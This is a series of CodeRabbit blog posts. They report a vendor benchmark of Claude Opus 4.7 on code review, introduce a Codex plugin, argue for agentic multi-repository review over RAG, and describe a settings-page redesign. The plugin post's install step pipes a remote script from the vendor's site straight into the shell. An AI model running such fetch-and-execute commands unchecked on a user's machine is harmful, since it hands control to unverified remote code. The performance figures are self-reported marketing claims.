You know the bug that ships on a Friday because the reviewer was rushing through a 40-file PR? The race condition buried three files deep that nobody traces until it pages someone at 2 AM? That's the gap AI code review was built to close. With Claude Opus 4.7, the gap just got a lot narrower. CodeRabbit's review engine doesn't rely on a single model. We run an ensemble of frontier models from multiple labs, selecting different models for different aspects of the review pipeline. Each model earns its slot through evaluation on real code. When a new frontier model ships, we benchmark it against every model in our current ensemble to see where it outperforms and where it doesn't. We've been testing it at CodeRabbit against our production code-review pipeline. The results aren't marginal improvements. We ran Opus 4.7 head-to-head across 100 evaluation points spanning a multitude of real-world open-source pull requests. Claude Opus 4.7 finds more real bugs, produces more actionable feedback, and reasons across files *better than anything we've tested before*. ## **How we evaluate models at CodeRabbit** Before diving into the results, it's worth understanding how we benchmark code-review models. Methodology matters as much as outcomes. Our evaluation framework is built around what we call Error Patterns (EPs): a curated set of 100 known issues drawn from actual pull requests across major open-source projects. Each EP maps to a specific, verified issue in a real PR: a race condition in a Go service, a missing null check in a React component, an authorization bypass in a Rails controller. For every model we test, we measure four core dimensions: 1. **Pass rate:** Does the model catch the known issue? 2. **Actionability**: Does the feedback tell the developer exactly what to fix? 3. **Comment Quality**: Does the model correctly classify severity? Is the output well-structured and code-backed? 4. **Signal-to-noise**: How much useful feedback does the model produce relative to noise? We scored Opus 4.7 against our current production baseline on the exact same rubric, across the same 100 EPs, on the same PRs. No cherry-picking, no special prompting for one model over the other. ## **Model performance on code reviews** Integrating Opus 4.7 in CodeRabbit delivers a jump in review quality across various metrics that we track. ![Performance comparison of AI code review: Claude Opus 4.7 significantly surpasses baseline metrics.](https://victorious-bubble-f69a016683.media.strapiapp.com/Figure1_Code_Review_aa8d4eb168.png) ### **Pass rate** On our core evaluation, whether the model catches the known issue in a given PR, integrating Opus 4.7 to CodeRabbit’s current code review harness passed on 68 out of 100 evaluation points, up from 55 on the baseline. That's a **24% relative improvement** in the model's ability to find the specific bug that matters. To put this in practical terms: imagine a team that merges 20 PRs a week, each containing at least one reviewable issue. With the baseline model, roughly 11 of those issues get caught. With Opus 4.7, that number jumps to nearly 14\. Over a quarter, that's roughly 36 additional bugs caught before they reach production. ### **Full-system score** When we layer in our full scoring system (which accounts for outside-diff context, nitpick filtering, and overall review coherence), the gap widens further. Integrating Opus 4.7 scored **74/100** compared to the baseline's **60/100**, a **23% relative improvement**. This metric captures something subtler than raw bug detection. A model might catch a bug but do so in a way that's confusing, references the wrong line, or buries the finding in unrelated noise. The full-system score penalizes those failure modes and rewards reviews that are coherent, well-targeted, and properly contextualized within the broader PR. The fact that Opus 4.7's full-system score improved *more* than its raw pass rate tells us the presentation quality improved alongside detection. The reviews are more coherent, better targeted, and properly contextualized. ### **Actionable review rate** Every single one of the 640 comments was marked actionable by our evaluator, meaning each one contained enough information for a developer to act on. But when we measure against EP-specific actionability (whether the actionable comment actually addresses the target issue rather than a tangential concern), **it jumped from 54% to 64%**. This is the difference between a reviewer who says "there's a problem somewhere in this file" and one who says "line 47 will panic when the user is nil because the guard clause on line 42 doesn't cover the `admin` role path. Here's a diff that fixes it." Both are technically actionable. Only the second one saves you time. ### **Important-issue yield** This is one of the most striking data points in our evaluation. Nearly **70% of all comments** Opus 4.7 generated were classified as important, meaning they flagged substantive bugs, security risks, or correctness problems rather than style nits or cosmetic suggestions. Of those 443 important comments, 367 were findings the model surfaced *beyond* the target evaluation point. That's 82.8% of all important output coming from issues the model discovered on its own, unprompted, while reviewing the same code. In other words, Opus 4.7 behaves less like a targeted test and more like a thorough reviewer who notices problems in the periphery while looking at the code you pointed it to. For context, the baseline model generated 558 total comments. Integrating **Opus 4.7 generated 640, about 15% more volume**. But the important-issue density is what sets it apart. More comments don't matter if they're noise. More *important* comments are a different story entirely. ## **What makes Opus 4.7 different under the hood** The scores above establish that Opus 4.7 is better. What follows explains *why*, and what it actually looks like when this model reviews your code. We spent significant time reading through individual comments, and several patterns emerged consistently across languages and codebases. ![Presentation slide highlighting Opus 4.7's Deep Bug Detection, cross-file bug connection, and fix-shipping reviews.](https://victorious-bubble-f69a016683.media.strapiapp.com/Figure_2_Different_8b48d54617.png) ### **Deep, mechanism-level bug finding** Across our evaluation set, the model consistently identified concrete races, nil/panic paths, authorization failures, blacklist bypasses, XSS and SSRF chains, response-shape mismatches, and lifecycle/data-loss bugs. In Go codebases, the model traced concurrent access patterns across goroutines to identify real race conditions: not just "this looks like it might have a race" but "goroutine A writes to `cache.entries` on line 137 while goroutine B reads it on line 140 with no synchronization, which will panic under concurrent load." It named the specific data structure, the specific lines, and the specific failure mode. In TypeScript/React code, it followed event handler lifecycles to spot state-management bugs. It tracked how a `useEffect` cleanup function interacted with an async fetch, identified the exact window where a stale closure could cause a state update on an unmounted component, and proposed a cancellation-token pattern as the fix. In Ruby on Rails controllers, it identified authentication bypass vectors that arise from parameter handling edge cases, the kind of subtle permissiveness that a human reviewer might miss on a Friday afternoon but an attacker won't miss on a Saturday. In Java (Keycloak specifically), it caught contract mismatches between service interfaces and their implementations, tracing through multiple layers of abstraction to identify where a runtime exception would surface. In Python (Sentry), it identified silent failure paths where exceptions were caught too broadly, causing data-processing pipelines to swallow errors and produce incomplete results without any visible alert. ### **Cross-file reasoning** One of the most impressive capabilities, and the one that benefits most from the expanded context window, is the model's ability to connect findings across files. Given a diff, it traces helper-level contracts to downstream breakage and compares behavior across related methods, handlers, or providers. Opus 4.7 can tell you that the parameter *was* used by two downstream callers that the PR author forgot to update and that one of those callers will now silently fall back to a default value that breaks the billing calculation for enterprise accounts. Our analysis confirmed this pattern: the model "often connects helper-level contracts to downstream breakage and compares behavior across related methods, handlers, or providers." We observed this consistently across dozens of review sessions spanning five different language ecosystems. ### **Patch-oriented output** The review style is extremely code-centric, and this is where the practical developer experience shines: * **99.1%** of comments contain inline code references (specific variable names, function calls, line numbers) * **74.5%** include full code blocks demonstrating the issue or the fix * **78.0%** include actual diffs showing the proposed remediation ![Breakdown of review comment content showing 99.1% in-code references and 78% proposed remediation.](https://victorious-bubble-f69a016683.media.strapiapp.com/figure3_coments_7b08d307a7.png) In practice, most comments arrive with a ready-to-apply fix. The average comment runs **1,124 characters across 21 lines**, reading like a mini design review rather than a drive-by annotation. A typical comment opens with a bold, verdict-style summary ("Race condition in cache invalidation"), follows with a concise mechanism/impact explanation (2-3 paragraphs tracing the specific code path), and closes with a concrete diff wrapped in a collapsible `

` block. ## **The tone shift: Direct and opinionated** If you've used earlier Claude models for code review, the tone of Opus 4.7 will feel noticeably different. Anthropic describes it as "more direct and opinionated, with less validation-forward phrasing." Our evaluation quantifies this shift. Opus 4.7's review comments have an **assertiveness rate of 77.6%** and a **hedging rate of just 16.5%**. It leads with a bold, verdict-style summary of the issue, follows with a concise mechanism/impact explanation, and then presents a concrete patch. The language uses clear imperatives: "Guard against nil," "Prevent concurrent access," "Validate input before processing" rather than tentative suggestions. Our tone analysis summarized it well: "Comments read like detailed mini code reviews. They open with a bold, verdict-style summary of the issue, follow with 1–3 explanatory paragraphs, and then present a concrete patch in diff form. The tone is confident and directive, using clear imperatives rather than tentative phrasing." For maintainers, this is a welcome shift. When a model tells you "this will panic on nil input" instead of "you might want to consider checking for nil," you save cognitive overhead and can act on the feedback faster. In a busy review queue, that directness multiplies across dozens of comments per day. The hedging that does remain is well-placed. It appears primarily around subjective or domain-specific decisions, for instance, flagging a localization string as potentially incorrect and suggesting "please have a native speaker confirm." That's appropriate humility. The model is confident where it has evidence and careful where it doesn't. **Want to see this in action?** [Try CodeRabbit on your next PR](https://coderabbit.link/NcmblIe) \- free to start, no credit card required. See Opus 4.7-powered reviews on your own code. ## **What it's actually like to code with Opus 4.7** Benchmarks tell you how a model performs on a rubric. They don't tell you what it feels like to sit down with it and build something. Our engineering team has been hands-on with Opus 4.7 for coding tasks beyond code review, and a few patterns emerged. ### **It talks to you: A lot** The first thing you notice is how communicative the model is. As it works, the model narrates: what it's doing, why, which variables it's modifying, which files it's touching, and what its reasoning is at each step. The tone isn't conversational,it’s tactical. Every token carries information, optimized for context transfer rather than warmth. If you're new to working with AI coding assistants, this is great. You get a running commentary that doubles as a learning tool. But if you're an experienced developer who's used to terse, get-it-done interactions, it can feel over-communicative. There's a calibration period where you learn to skim the explanations and focus on the code output. The same depth we measured in the review benchmarks carries over. ### **Speed and reasoning scale together** Opus 4.7 has a strong sense of task complexity. When you give it something simple (rename a variable, add a guard clause, write a utility function), it moves fast. When you give it something genuinely hard (refactor a state machine, redesign an authentication flow, untangle a circular dependency), it takes more time to reason, and you can feel the difference. Even on complex tasks, the overall velocity is noticeably faster than previous models. The model seems to understand *how much thinking a task deserves* and allocates accordingly, so it doesn't waste your time over-reasoning on trivial work. In practice, this means you can move through a task backlog at speeds we haven't seen before. Simple changes fly by. Complex changes take longer but arrive with fewer bugs and better structure. ### **Code quality is high out of the gate** Across our first batch of hands-on sessions, the code quality was consistently strong. We encountered very few bugs during initial exploration, the kind of "it runs but doesn't work" failures that typically plague first-pass AI-generated code were notably rare. The model seems to get the logic right on the first try more often than not. There's a nuance here for frontend work. Opus 4.7 is excellent at the *logic* of UX: the placement of elements, the flow between states, the interactive behavior of components. But it doesn't have a great design taste. The UI it generates is functional and well-structured, but it won't win any design awards. If you're building a prototype or an internal tool, that's fine. If you're building a consumer-facing product, expect to bring your own design system and use the model for the logic layer. ### **It understands messy prompts** One thing that surprised us: Opus 4.7 is remarkably good at interpreting imprecise prompts. You don't need to write perfectly structured instructions. You can be vague, incomplete, or even somewhat contradictory in your prompt, and the model will generally infer what you actually meant and produce something useful. In real-world usage, developers are thinking faster than they're typing. They don't want to spend time crafting the perfect prompt, and with Opus 4.7, they don't have to. This tracks with what our benchmarks show in the code-review context. The model appears to reason about broader intent and context rather than treating each instruction as an isolated directive. ### **The self-review loop: Powerful but sometimes overeager** One of the more interesting behaviors we observed is that Opus 4.7 will often go back and review its own work after completing a task. It'll generate the code, then scan it for issues, then attempt to fix what it found, all without being asked. This self-correction loop can be genuinely valuable. It catches things the model missed on the first pass and improves the final output. But there's a downside. Sometimes the model overthinks it. It'll identify a "problem" in otherwise clean code and start reworking sections that didn't need to be touched, introducing unnecessary changes or even new issues in the process. The model's thoroughness occasionally tips over into over-correction. For developers, the practical advice is to review the model's self-edits with the same scrutiny you'd apply to any code change, and don't hesitate to roll back the second pass if the first one was already correct. ### **Surprising creative range** This was unexpected: Opus 4.7 is genuinely good at creative work. When we asked for titles, taglines, naming suggestions, and creative copy, the model produced results that felt original. It also performed well on graphical tasks: generating images, logos, vector graphics, and pixel art with a level of quality and coherence that went beyond what we expected from a model primarily known for code and reasoning. For developers who wear multiple hats (and most of us do), that creative range means you can use the same model for both the code and the marketing page that explains it. ## **Where we see room for improvement with Claude Opus 4.7** No model is perfect, and we'd rather be upfront about the rough edges than have you discover them yourself. 1. **Severity calibration is aggressive.** As the breakdown above shows, the model skews toward `critical` and `major`. While many of those labels are justified, the model also applies `critical` to speculative security surfaces, migration risks, and test-only failures that don't meet a strict rubric for that level. Identical comment text occasionally receives different severity labels across similar contexts, reflecting annotation instability we need to smooth out. We're tuning our post-processing pipeline to normalize these before they reach developers. 2. **Comment density is high.** The raw output is more "exhaustive audit" than "focused review." Not every PR needs 19 comments. Our filtering, ranking, and deduplication layers are essential to turning this into a usable signal that doesn't overwhelm developers. 3. **Duplicate findings across evaluation contexts.** We observed that the model sometimes produces near-identical comments across related code paths: for example, the same null-check warning applied to three similar handler functions. While each instance is technically correct, the repetition inflates apparent coverage and adds noise. Deduplication by normalized text \+ file/line is a necessary post-processing step, and we've seen cases where 30 \- 40 raw comments collapse to 10 \- 20 unique findings after deduplication. 4. **The over-correction instinct.** As we noted in our hands-on section, the model's self-review behavior (which is a strength in many contexts) can sometimes lead to unnecessary rework. In a code-review context, this manifests as the model flagging code patterns that are intentional or idiomatic as potential issues. The model's thoroughness is a feature, but its calibration on when to stop is still a work in progress. ![Graphic showing Opus 4.7 coding strengths like bug catching and review quality, with caveats.](https://victorious-bubble-f69a016683.media.strapiapp.com/figure4_pro_con_d213042f1a.png) ## **What integrating Opus 4.7 means for CodeRabbit users** We're actively integrating Opus 4.7 into our review pipeline. Here's what you can expect as we roll it out: * **More bugs caught before merge.** The pass-rate and full-system improvements we detailed above translate directly into fewer escaped bugs. Over weeks and months, that compounds into meaningfully fewer production incidents, fewer hotfixes, and fewer late-night on-call pages. * **Feedback you can act on immediately.** Most findings arrive with inline code and ready-to-apply diffs. For many of them, you'll be able to apply the suggested change directly, review it, and move on, saving minutes per comment and hours per week. * **Better cross-file awareness.** If your PR updates a shared utility but forgets to update one of its three callers, Opus 4.7 is significantly more likely to catch that than previous models. Complex refactors and multi-file changes get smarter coverage. Opus 4.7 represents a step function in what's possible with AI-assisted code review. Stronger reasoning, broader context, more actionable output, configurable depth. The gap between AI review and expert human review continues to narrow. The AI isn't replacing the human reviewer. It's covering the ground that humans don't have time for. If you haven't tried CodeRabbit yet, there's never been a better time. Connect your repository in under two minutes. The model got a lot smarter, and so did your code reviews. [**Get started with CodeRabbit**](https://coderabbit.link/NcmblIe) \- connect your repo, get your first AI review in minutes. Free to try, no credit card required.

Introducing the CodeRabbit plugin for Codex

Juan Pablo Flores — Wed, 15 Apr 2026 00:00:00 GMT

Staying in flow matters. The moment a developer has to leave the current session to run a review somewhere else, wait for results, and context-switch back to act on findings, that momentum breaks. The CodeRabbit plugin for Codex brings AI-powered code reviews directly into the same surfaces where developers are already writing and iterating on code, so they can get structured feedback while the work is still fresh and move faster from draft to pull request. That matters most when a developer is already using agents to write, edit, and refine code inside the same session. Feedback lands better when it shows up before a change reaches a pull request, while the developer still has full context. Catching issues at that stage shortens review cycles, reduces back-and-forth, and helps teams ship with fewer surprises. %[https://youtu.be/NDcFLXQ3BhA] Bringing review into the same session where code is being written is the gap we wanted to close. A developer can ask Codex to "review my current changes with CodeRabbit" and the agent handles the rest: checking whether the [CodeRabbit CLI](https://docs.coderabbit.ai/cli) is installed, running authentication, executing the review against the working branch, and returning findings ordered by severity. All without leaving the terminal or the Codex app. ## How it Works At its core, the CodeRabbit plugin helps Codex run reviews without pushing the developer into a separate workflow. In practice, the flow looks like this: 1. A developer asks Codex to review the current changes using CodeRabbit. 2. The plugin checks whether the [CodeRabbit CLI](https://docs.coderabbit.ai/cli) is installed and whether the user is signed in. 3. Codex picks the right review target and runs CodeRabbit against the relevant changes. 4. Findings come back ordered by severity inside the same working session. 5. The developer can act on that feedback immediately or ask the agent to help fix the issues and review again. That first run experience is a big part of the value. On setup, the plugin guides the agent to check for required tooling, install it when needed, and only ask for user input when account sign in is necessary. The result is that review can stay closer to the work itself, which makes it easier for developers to act on findings immediately and for teams to move through review with less friction. ## Prerequisites Before installing the plugin, make sure you have:

**CodeRabbit CLI installed.** Install it globally by running:
```
curl -fsSL https://cli.coderabbit.ai/install.sh | sh
```
Restart your shell after installation to make sure the CLI is available.
**A CodeRabbit account.** You need to be authenticated before running reviews. You can sign in or [get started](https://app.coderabbit.ai/login?free-trial=&utm_source=blog&utm_medium=article&utm_campaign=%3Cblog-signups%3E&utm_term=%3Ccr-cntnt%3E&utm_content=%3Call-blgs%3E) by running the authentication command within Codex and completing sign-in in the browser when prompted. The [CodeRabbit CLI](https://docs.coderabbit.ai/cli) is free to use, with [rate limits](https://docs.coderabbit.ai/cli#pricing-and-capabilities) on the free tier.

## Installation Codex supports plugin installation from the Plugin Directory in both the app and the CLI. The steps differ slightly depending on where you are working. ### In the Codex app: 1. Open *Plugins* from the sidebar. 2. Search for CodeRabbit and select Add to Codex. 3. If prompted, complete authentication during setup. ### In the Codex CLI: 1. Run `codex` and open `/plugins`. 2. Search for CodeRabbit and select Install plugin. 3. If prompted, complete authentication during setup. ### After installation: 1. Start a new thread and ask Codex to review your current changes. You can also type `@coderabbit` to invoke the plugin directly. 2. If you have not yet authenticated, the plugin will guide Codex through the sign-in process on first use. You will know the installation worked when Codex can recognize the review request, route it through CodeRabbit, and return findings inside the same session. The workflow works from both the Codex app and the CLI, so you can run reviews wherever you are already working. ## What Comes Next This first version is a starting point. We plan to keep refining how review feedback flows back into the agent and to expand the plugin with new skills as the workflows mature. Because users get updates through the plugin itself, new capabilities arrive without any extra setup. If you try it, we would love to hear how it goes. Tell us what to improve next in the [CodeRabbit subreddit](https://www.reddit.com/r/coderabbit/) or the [CodeRabbit Discord](https://discord.com/invite/coderabbit).

Why agentic code review beats RAG for multi-repository analysis

Sahana Vijaya Prasad — Tue, 14 Apr 2026 00:00:00 GMT

Software development today is rarely limited to a single repository. A complex system might involve a microservices backend, a shared type library, a frontend application, and an integration test suite, all living in separate repositories. Because of this, changing an API signature in one repository can quietly break consumers in several others. ![Flowchart illustrating how API signature changes propagate across interdependent software repositories.](https://victorious-bubble-f69a016683.media.strapiapp.com/newimageforblogmulti_202ac3062e.png) Figure 1: Modern systems span multiple repositories — a change in one can silently break others Traditional code review tools treat each pull request as an isolated unit. When a reviewer catches a cross-repo breaking change, it usually happens because they already understand the system, not because the tooling surfaced it. The real question for [engineering leaders evaluating code review tools](https://www.coderabbit.ai/blog/framework-for-evaluating-ai-code-review-tools) is simple: how does the tool understand impact across repository boundaries? The answer exposes a fundamental architectural divide between tools that rely on pre-built vector indexes and tools that actively explore your code at review time. ## At CodeRabbit, we’ve been building agents since 2024 Before explaining why agentic systems win for cross-repo analysis, it’s worth being direct: CodeRabbit has been building and running this kind of agent-based validation loop since 2024, before this architectural pattern became industry consensus. The approach wasn’t inspired by [Anthropic’s “Building Effective Agents” guide](https://www.anthropic.com/research/building-effective-agents) or [Google Cloud’s writings on Agentic RAG](https://cloud.google.com/resources/core-concepts-ai-agents). Those publications validated what we had already learned in practice: that code review across repository boundaries is fundamentally an investigation problem, not a retrieval problem. You can’t pre-index your way to the right answer when you don’t know in advance which files matter. Here’s a concrete example of the kind of validation script our agent generates when reviewing cross-repo impact: ``` // Agent-generated validation: UserService.createUser signature change // PR: auth-service \#1423 — adds required roleId parameter const impactedCallSites \= \[ { repo: "org/backend-api", file: "src/controllers/admin.ts", line: 45, currentCall: "userService.createUser(email, name)", issue: "Missing required roleId argument — will throw at runtime", severity: "breaking" }, { repo: "org/backend-api", file: "src/controllers/onboarding.ts", line: 112, currentCall: "createUser({ ...userPayload })", issue: "Spread object may not include roleId — needs verification", severity: "warning" }, { repo: "org/integration-tests", file: "tests/fixtures/user-factory.ts", line: 23, currentCall: "UserService.createUser(email, name)", issue: "Test fixture calls old signature — will fail in CI", severity: "breaking" } \]; ``` This is what the agent produces: precise, file-level findings grounded in live code, not a list of semantically similar snippets. The rest of this post explains why that difference is architectural, and why tools that still rely solely on RAG pipelines can’t replicate it. ## How most code review tools approach cross-repo context The dominant pattern follows the RAG pipeline: 1. **Index:** Code from related repositories is periodically chunked, converted into numerical representations (embeddings), and stored in a vector database. 2. **Retrieve:** When a PR is opened, the changed code is similarly converted, and a nearest-neighbor search returns the most mathematically similar chunks from the index. 3. **Generate:** The AI receives those retrieved chunks alongside the PR diff and produces its review. This approach is well-understood and broadly adopted. [Forrester’s analysis](https://www.forrester.com/blogs/forresters-guide-to-retrieval-augmented-generation-rag/) confirmed RAG as the default architecture for enterprise knowledge assistants. But [research has identified structural weaknesses](https://arxiv.org/abs/2501.09136) that are particularly acute when the task is code review across repositories — a domain where precision matters and false confidence is dangerous. ## The five limitations of RAG-based code review ### 1. The retrieval bottleneck When the initial search misses the relevant code, due to semantic mismatch, poor chunking that splits a function across two fragments, or because the relationship is structural rather than textual, the system has no recovery mechanism. For code review, this means: if the vector search doesn’t find the downstream consumer of the API you just changed, the tool won’t tell you it exists. No second chance, no alternative strategy. Industry data underscores the severity: [NVIDIA’s technical blog reports](https://developer.nvidia.com/blog/traditional-rag-vs-agentic-rag-why-ai-agents-need-dynamic-knowledge-to-get-smarter/) that standard RAG “retrieves once and generates once, searching a vector database, grabbing the top-K chunks, and hoping the answer is in those chunks.” When that single shot misses, the entire review is compromised. ### 2. Consistency and synchronization gaps Modern vector databases have significantly reduced raw indexing latency, with many now offering updates in mere seconds. But “fresh” infrastructure doesn’t guarantee correct or complete context. RAG pipelines still depend on multiple steps: detecting changes, re-chunking files, recomputing embeddings, and updating indexes. In multi-repository systems, this compounds: * New consumers may not yet be indexed * Renamed symbols can exist under conflicting embeddings * Cross-repo relationships aren’t updated atomically The consequence of relying on incomplete or inconsistent analysis in code review is often false confidence. Agentic systems circumvent this risk by analyzing the code live at the time of review. ### 3. Context poisoning A common problem in code analysis is that semantically similar retrieved information often lacks true relevance, contaminating the AI's reasoning. [Anthropic’s engineering team](https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents) has documented this as “context rot.” In code review, this manifests as confident-sounding analysis grounded in the wrong code which is arguably worse than no analysis at all. ### 4. Inability to follow references Code relationships are fundamentally structural, not semantic. For instance, a function call, an import statement, or a reference to a protobuf schema represents a graph relationship, a structure that similarity search methods struggle to identify. If a shared type definition is modified, the critical factor is identifying the code that imports it, rather than finding code chunks that are merely textually similar. ### 5. No reasoning, only matching A vector search can find code that looks like the code you changed. It cannot determine that src/controllers/admin.ts:45 calls userService.createUser(email, name) with two arguments while your PR changes the signature to require three. That requires reading the code, understanding the call site, and reasoning about the mismatch. ## The industry shift toward agentic systems Anthropic drew the clearest line in their influential [“Building Effective Agents” guide](https://www.anthropic.com/research/building-effective-agents): Cross-repository impact analysis is precisely described by the requirement for agents because "it's difficult or impossible to predict the required number of steps." [OpenAI released the Agents SDK](https://openai.com/index/new-tools-for-building-agents/) in March 2025 for scenarios where teams shifted “from prompting step-by-step to delegating work to agents.” [Google Cloud stated it most directly:](https://cloud.google.com/resources/core-concepts-ai-agents) “The most powerful approach to grounding is Agentic RAG, where the agent is no longer a passive recipient of information but an active, reasoning participant in the retrieval process itself.” These publications reflect where the industry is converging. They also describe exactly what CodeRabbit has been doing since 2024\. ## CodeRabbit’s approach: Agentic, real-time exploration CodeRabbit’s multi-repository analysis embodies the agentic architecture. Rather than pre-indexing code into static representations and hoping the right chunks surface at query time, CodeRabbit deploys an autonomous research agent that actively explores linked repositories in real time. ### How it works Configuration is simple. Teams declare which repositories are related: ``` knowledge\_base: linked\_repositories: \- repository: "org/backend-api" instructions: "Contains REST API consumers of shared types" \- repository: "org/integration-tests" instructions: "End-to-end test fixtures" When a PR is opened, the agent executes a multi-step research strategy: * Reads the PR context to understand what changed and which APIs, interfaces, types, or dependencies are affected * Identifies which related repositories might be impacted, using pre-computed architectural summaries * Explores those repositories in real time — cloning them on demand into isolated sandboxed environments * Reflects on what it finds and adapts its search strategy — trying the type name, import path, or dependency declarations if the first search returns nothing * Summarizes only findings directly relevant to the review, with precise file paths and line number![][image2] ![Flowchart illustrating the Apollo Anti-Refactoring Review process, from PR context to reporting findings.](https://victorious-bubble-f69a016683.media.strapiapp.com/agentic_multi_repository_review_fbbca3e961.png) Figure 2: CodeRabbit’s agentic review flow — iterates until it has verified evidence ### What the agent finds that RAG cannot Consider a Pull Request that modifies the `UserService.createUser` method signature in the `auth-service` repository, introducing a mandatory `roleId` parameter. While a RAG-based tool can identify code fragments containing the string "createUser," it lacks the capability to determine if these call sites will actually fail due to the signature change. backend-api (org/backend-api) * src/controllers/admin.ts:45 — calls createUser(email, name) without roleId. Will break after the signature change. * src/controllers/onboarding.ts:112 — calls createUser with a spread object, which may need updating. integration-tests (org/integration-tests) * tests/fixtures/user-factory.ts:23 — creates users via old signature. Will fail in CI. The difference is not incremental. It is the difference between “here are some similar code chunks” and “here are the three call sites that will break, with file paths and line numbers.” ## Head-to-head: Agentic vs. RAG-based multi-repo review | Dimension | RAG-based review tools | CodeRabbit (Agentic) | | :---- | :---- | :---- | | Data freshness | Reflects last index build (hours to days old) | Live code at HEAD, always current | | Recovery from missed results | None, single-shot retrieval with no fallback | Agent iterates: tries alternative searches, follows references, reads files to verify | | Understanding code relationships | Textual similarity only cannot follow imports, call graphs, or type hierarchies | Navigates code structurally greps for imports, reads call sites, follows type definitions | | Reasoning about impact | Returns similar chunks; cannot reason about whether a call site will break | Reads code, counts arguments, checks type compatibility reasons about actual impact | | Handling ambiguity | Returns top-k results regardless of confidence | Agent reflects on result quality, runs refined searches when uncertain, stops when self-contained | | Precision of findings | Code chunks (often partial, sometimes irrelevant) | Specific files, line numbers, and explanations of why the finding matters | | Security model | Requires persistent index of your code in external services | On-demand cloning into isolated sandboxes; no persistent code storage | ## Why this matters for engineering leaders Major industry players like Anthropic, OpenAI, Google, and Microsoft are unanimously investing heavily in agentic infrastructure, including MCP, Agents SDK, Agent Development Kit, and the A2A Protocol. This significant consensus signals a clear future for AI-powered tooling: autonomous, reasoning systems are poised to replace static retrieval pipelines. Cross-repository code review requires: * Open-ended exploration: The tool doesn’t know in advance which files matter * Structural understanding: The relationships that matter are imports, call sites, and type hierarchies, not textual similarity * Reasoning under uncertainty: The tool must determine whether a change breaks a consumer, not just find similar code * Real-time accuracy: Stale results in code review create false confidence, which is worse than no results Retrieval-Augmented Generation (RAG) is fundamentally mismatched for multi-repository code review. RAG excels at question-answering by grounding LLMs in a knowledge base, but analyzing code across repositories demands an investigative approach, not mere knowledge retrieval. CodeRabbit’s choice to use an agentic architecture for cross-repository impact analysis isn’t a response to industry trends. It’s what we built because it’s the only architecture that actually solves the problem. The industry is catching up to where we’ve been since 2024\. Want to see CodeRabbit’s cross-repository analysis in action? [Try it for free on your next PR](https://coderabbit.link/NcmblIe).

Our settings page was overwhelming our users. Here's what we did to fix it

Sahana Vijaya Prasad — Fri, 10 Apr 2026 00:00:00 GMT

CodeRabbit reviews code across every language, framework, and team size. Solo developers shipping side projects. Enterprises enforcing compliance across hundreds of repositories. That range means a lot of configuration knobs. More than a 2004 Honda Civic dashboard, certainly. Every setting exists because someone needed it. Path-specific review instructions, tool-level toggles, draft PR handling, labeling rules, tone control. Each one is a dealbreaker for somebody. Remove it and you lose them. Keep it and the settings page grows. Over time, our settings page became a wall of options that overwhelmed a lot of users — especially those new to CodeRabbit. Here's how we solved it and what we learned along the way. ## Who's actually in the settings page? Before changing anything, we looked at who was using the settings and what they were doing there. Four patterns showed up. 1. **The "just make it work" user.** They install CodeRabbit, maybe change the review language, and never come back. They want sensible defaults and the confidence that they're not missing anything important. 2. **The hands-on developer.** They spend fifteen minutes tuning things: adjusting the tone, setting up path-specific instructions, toggling walkthrough sections. Then they leave it alone. 3. **The platform team.** Enterprises with compliance requirements and standards enforced across every repo. They need access to everything because their use cases are the edge cases. 4. **The "config as code" user.** They don't want a UI at all. They want a YAML file in version control, reviewed in a PR, applied automatically. Configuration is infrastructure. A challenge for our team was recognizing that these weren't fixed user segments. A single user might belong to the "just works" group on Monday and the "config as code" group on Friday. ## **Why we couldn't just add an "Advanced" toggle** The obvious fix for settings overload is a simple view with an "Advanced settings" toggle. We tried it, but it didn't work for a couple of reasons. Our settings UI is generated directly from a JSON schema — the same schema that powers every `.coderabbit.yaml` file across millions of repositories. When a developer adds a property to the schema, the UI renders it automatically, without any additional frontend work. We didn't want to lose that. Bolting "basic" and "advanced" flags onto the schema would have added complexity to the one system we'd kept simple. But the deeper problem was simpler than architecture. We couldn't agree on what was basic versus advanced. Is "Auto-assign reviewers" a basic setting or an advanced one? For a solo developer it's a niche toggle; for an enterprise team it's a critical workflow. The basic/advanced split assumes users fall on a single axis of sophistication. Ours don't. A setting that's advanced for one persona is table stakes for another. ## Three views, one truth Since we couldn't restructure the schema or agree on two tiers, we tried something else: decoupling how settings are presented from how they're stored. We built three views over the same configuration. 1. **Concise** is the default. It shows a curated subset — the settings the vast majority of users actually change. We picked them based on usage data, support signals, and direct user feedback. The grouping is different from the schema too; "Behavior" pulls settings from multiple schema sections because that's how users think about them. 2. **All settings** show everything. Same auto-generated UI from the schema, same grouping as the YAML structure. The platform team that needs tool-specific rules or knowledge base settings finds it all here. 3. **YAML editor** is a Monaco editor with schema validation. Edit configuration as code, in the browser, with real-time error checking. All three read from and write to the same data. This shifted the conversation from "is this basic or advanced?" to "do most users need to see this?" without needing to maintain a separate schema. ## Making settings tangible Three views solved the structure problem, but there was a deeper issue: settings are abstract. "Enable sequence diagrams" means nothing if you don't know what a sequence diagram looks like in a PR review. So we added a live preview panel. It shows a mock PR review comment right next to the settings. ![Comparison of PR author-generated summary and AI-generated summary by CodeRabbit.](https://victorious-bubble-f69a016683.media.strapiapp.com/image4_338b48052c.png) ![GitHub pull request page displaying a sequence diagram, file changes, and estimated review effort.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_516520fd32.png) Toggle "sequence diagrams" off and the diagram disappears from the preview. Settings tagged with "Preview" tell the user which ones have a visible effect — instead of configuring blindly, users can see the result before they save. ![Dark UI settings panel with multiple options and active orange toggle switches.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_b7f9435168.png) This solved one of the bigger problems that reorganizing the settings alone couldn't, which is users didn't understand what the settings controlled. ## **What we learned** Settings pages aren't glamorous. But get them wrong and every power user you have will feel it. Here are the three things that stuck with our team after this process and how we'll take it into our next redesign. 1. **There's no single right view for all users.** A solo developer and an enterprise platform team need fundamentally different things from the same settings page. What worked was giving them different paths to the same configuration and making transitions between them seamless. Someone who starts in Concise and can't find what they need should land in All Settings smoothly — not hit a dead end. 2. **Structure alone doesn't solve confusion.** We spent a lot of time on organization and grouping, but the preview panel ended up being one of the most impactful changes, and it had nothing to do with structure. Showing the output next to the input made settings concrete in a way that descriptions never could. 3. **Protect what already works.** We could have restructured the schema to make the UI cleaner. It would have broken every `.coderabbit.yaml` file out there. Keeping the data layer stable and putting the flexibility in the presentation layer let us ship a completely different experience without introducing regressions elsewhere. Ready to try it yourself? Start your [free trial of CodeRabbit](https://coderabbit.link/NcmblIe).

Your plan has a limit. Your sprint doesn't have to.

Konrad Sopala — Thu, 09 Apr 2026 00:00:00 GMT

